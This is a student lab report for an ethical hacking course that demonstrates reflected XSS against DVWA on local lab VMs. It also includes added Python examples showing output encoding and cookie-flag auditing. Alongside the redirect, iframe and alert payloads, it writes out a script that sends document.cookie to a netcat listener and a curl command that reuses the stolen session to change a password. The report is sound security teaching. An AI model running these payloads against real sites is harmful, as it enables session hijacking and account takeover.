
AEH LAB 2: Cross Site Scripting

Team Cobra

COMP4077 Advanced Ethical Hacking

Woody Yao / 101493514
Deepika Verankki / 100548781
Hadi Ul Hamd / 101516394
Abraham Varghese / 101503022
Bilal Wardak / 101505588
Pre-setups
Before we start the lab, the Kali VM and Metasploitable2 VM need to be prepared first.

On VMware Workstation, when we open the Kali Linux and Metasploitable 2 VMs and run the
ifconfig command, we can see the IP address and subnet mask of each. The IP address of
Kali Linux is 192.168.170.133 with subnet mask 255.255.255.0, and the IP address of
Metasploitable2 is 192.168.170.134 with subnet mask 255.255.255.0. Both VMs can ping
each other successfully, and we can also ping public domains without any problems.
To conduct this lab, we also need DVWA installed on the Kali machine. We can either run
apt install dvwa, or clone the GitHub repository with git clone and then run its
installation script.
Using apt install dvwa:
Using the installation script:

After the installation completes, we can log in to DVWA, either on the Metasploitable2
machine or on localhost, with the default credentials.
Visiting DVWA on localhost for the first time takes the user to the setup page. After
clicking the button to create the database, DVWA is ready to use.
The Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application. It is free
and open source, designed for security professionals to test their skills and understand
web application security. It provides a platform to experiment with penetration testing
tools and practise exploitation techniques against common vulnerabilities.
The final pre-setup step is to go to the DVWA Security page and turn the security level
down to low so we can run the cross-site scripting payloads; at higher levels the
application's filtering may block the script when we run it in the browser.
1. Demonstrate Reflected XSS as mentioned in the lecture. Test all the commands/scripts
shown by your instructor in the slides in DVWA.

To perform reflected XSS, we first navigate to the page by clicking the “XSS (Reflected)”
tab.

Once we submit the input, not only does the page echo what we typed in the textbox, but
the URL also shows the value of the name parameter.
Furthermore, since it is a web application, we can also inject HTML markup. Other than
heading1 <H1> and italic <i>, which were shown in the class lecture, here we also try
bold <b> and heading3 <H3>:
Next, we try injecting scripts and running them.
The alert function pops up a window showing the supplied text.
After entering <script>document.location = "http://yahoo.com"</script> into the input
field of the "XSS (Reflected)" section in DVWA and submitting it, the script automatically
redirects the page to the designated website, http://yahoo.com in this case. This
demonstrates a reflected XSS vulnerability: injected scripts are executed and can redirect
users to other websites that host malware or other malicious content.
Here we continue the practice with <iframe src="http://google.com"></iframe>. An inline
frame (iframe) is an HTML element that loads another HTML page within the document; it
essentially places another webpage inside the parent page. Iframes are commonly used for
advertisements, embedded videos, web analytics and interactive content. However, the
browser shows that google.com does not allow itself to be embedded because of its security
policy. We can still embed other content, such as a YouTube video, via XSS with <iframe
src="https://www.youtube.com/embed/WkyDxNJkgQ4?si=o2TCvHKiRCNPNSII"
title="YouTube video player"></iframe>:
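As an added example (not code from the lab report or from DVWA), the following mirrors the reflected "Hello <name>" echo as the low security level behaves, beside an output-encoded version, and checks both against the payloads used above; the function names are hypothetical.

```python
# Added example, not code from the lab report or from DVWA: the reflected "Hello <name>" echo
# as the low security level behaves, beside an output-encoded version, checked against the
# payloads used in this lab. Function names are hypothetical.
import html
from html.parser import HTMLParser

WRAPPER_TAGS = {"pre"}   # markup the page itself emits around the echoed value

class InjectedMarkupFinder(HTMLParser):
    """Collects tags (and script-bearing attributes) that came from the echoed value."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in WRAPPER_TAGS:
            self.findings.append(tag)
        for name, value in attrs:
            # Event handlers and javascript: URLs run code without a <script> tag.
            if name.startswith("on") or (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name}")

def injected_tags(fragment: str) -> list:
    finder = InjectedMarkupFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings

def render_vulnerable(name: str) -> str:
    # Low level: the name parameter is concatenated into the page without encoding.
    return f"<pre>Hello {name}</pre>"

def render_safe(name: str) -> str:
    # Fix: HTML-entity-encode the untrusted value (quotes included) before it reaches the
    # page, so the browser shows the payload as text instead of parsing it as markup.
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"

LAB_PAYLOADS = [   # taken from the report's reflected XSS section
    "<b>Team Cobra</b>",
    "<H3>Team Cobra</H3>",
    "<script>alert(document.cookie)</script>",
    '<script>document.location = "http://yahoo.com"</script>',
    '<iframe src="http://google.com"></iframe>',
]

def compare(payloads=LAB_PAYLOADS) -> dict:
    """Per payload: markup that survives the unencoded render vs the encoded render."""
    return {p: (injected_tags(render_vulnerable(p)), injected_tags(render_safe(p)))
            for p in payloads}
```

Running compare() shows every payload producing tags in the unencoded render and none in the encoded one, which is the behaviour DVWA's higher security levels approximate.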

With <script>alert(document.cookie)</script>, we are able to read the cookies of the host,
but it will also raise a red flag for the user. To avoid that, we may start netcat as a
listener, then run <script>new Image().src="http://localhost:9999/"+document.cookie;</script>
on DVWA:
This script creates an image object and sets its source to a URL formed by concatenating
"http://localhost:9999/" with the value of the document.cookie property, which holds the
cookies the browser stores for this site. When the browser loads that URL, the cookies
are sent to the specified server, in this case the netcat listener.
With the intercepted cookie, we can now change the user password remotely:
After we execute the command curl -b "security=low;PHPSESSID=p7d1d1f623crcnk4dom3pa9di6"
--location "http://localhost/DVWA/vulnerabilities/csrf/?password_new=helloworld&password_conf=helloworld&Change=Change#",
the password is changed to “helloworld” instead of “password”.
We may also encode the URL with base64 to pass the security check.
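As an added example (not from the lab report), this audits Set-Cookie headers for the flags that blunt the two attacks just shown: HttpOnly keeps a cookie out of document.cookie, so the image-beacon script would carry no session id, and SameSite limits when the browser attaches the cookie to cross-site requests such as the password-change request above. The two sample headers are constructed, not captured from DVWA.

```python
# Added example, not from the lab report: audit Set-Cookie headers for the protective
# attributes a session cookie should carry. The sample headers below are constructed.
from dataclasses import dataclass, field

REQUIRED_FOR_SESSION = ("httponly", "secure", "samesite")

@dataclass
class CookieAudit:
    name: str
    attributes: dict = field(default_factory=dict)   # lower-cased attribute -> value
    missing: list = field(default_factory=list)

    @property
    def exposed_to_script(self) -> bool:
        # Without HttpOnly, document.cookie (and any injected script) can read this cookie,
        # which is exactly what the new Image().src beacon relies on.
        return "httponly" not in self.attributes

def parse_set_cookie(header: str) -> CookieAudit:
    """Split one Set-Cookie header value into its cookie name and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip().lower()
    return CookieAudit(name=name, attributes=attrs)

def audit_session_cookie(header: str) -> CookieAudit:
    """Record which protective attributes a session cookie lacks."""
    audit = parse_set_cookie(header)
    audit.missing = [a for a in REQUIRED_FOR_SESSION if a not in audit.attributes]
    # SameSite=None gives no cross-site restriction, so report it as missing as well.
    if audit.attributes.get("samesite") == "none":
        audit.missing.append("samesite")
    return audit

# Constructed headers: the first resembles a bare PHP session cookie with no protective
# flags, the second the same cookie hardened.
DEFAULT_HEADER = "PHPSESSID=constructed0123456789; path=/"
HARDENED_HEADER = "PHPSESSID=constructed0123456789; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    for hdr in (DEFAULT_HEADER, HARDENED_HEADER):
        a = audit_session_cookie(hdr)
        print(f"{a.name}: missing={a.missing} readable_by_script={a.exposed_to_script}")
```

Note that Secure would stop the cookie being sent over the plain-HTTP localhost setup used in this lab, so in a lab environment HttpOnly and SameSite are the two flags that can be tested directly.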

2. Demonstrate Stored XSS as mentioned in the lecture. Test all the commands/scripts
shown by your instructor in the slides in DVWA.

3. Demonstrate Reflected XSS as mentioned in the lecture but this time use Mutillidae
Portal. Test all the commands/scripts shown by your instructor in the slides.
